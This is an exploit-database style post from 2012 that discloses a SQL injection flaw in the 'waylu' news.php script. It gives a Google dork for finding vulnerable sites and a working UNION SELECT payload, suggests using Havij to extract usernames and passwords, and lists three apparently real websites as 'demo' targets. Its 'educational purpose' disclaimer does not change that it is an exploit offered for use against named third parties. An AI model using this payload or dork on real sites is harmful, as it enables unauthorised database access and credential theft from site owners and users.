facebook facebook twitter rss

waylu (news.php) SQL Injection Vulnerabilties

Author: Mr NoRvI , Published: 20-05-2012
                                                                     



++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Exploit Title : waylu (news.php) SQL Injection Vulnerabilties
# Dork In Google : inurl:"/products_xx.php?id="
# Date : 20-05-2012
# Author : Mr NoRvI
# Email : x_____@w.cn
# Severity : High
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- Use it at your risk,,,
This was written for educational purpos,,,
Author will be not responsible for any damage.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Exploit :

#http://site.com/news.php?id=[SQL] [Error]

#http://site.com/news.php?id=-1+union+select+1,version(),3--

# You will find All the Version : 5.1.49-community

#Use havij or your Brain To get THe username And the password :p

#Some Demo Sites :

http://urmidwar.org/news.php?id=1'
http://creativepublicschoolgangapurcity.com/news.php?id=1
http://tensionoutservices.com/news.php?id=1

And More in google :p

#Greetz to: Arhack Forum & 1337day.com

./Done


Like us on Facebook :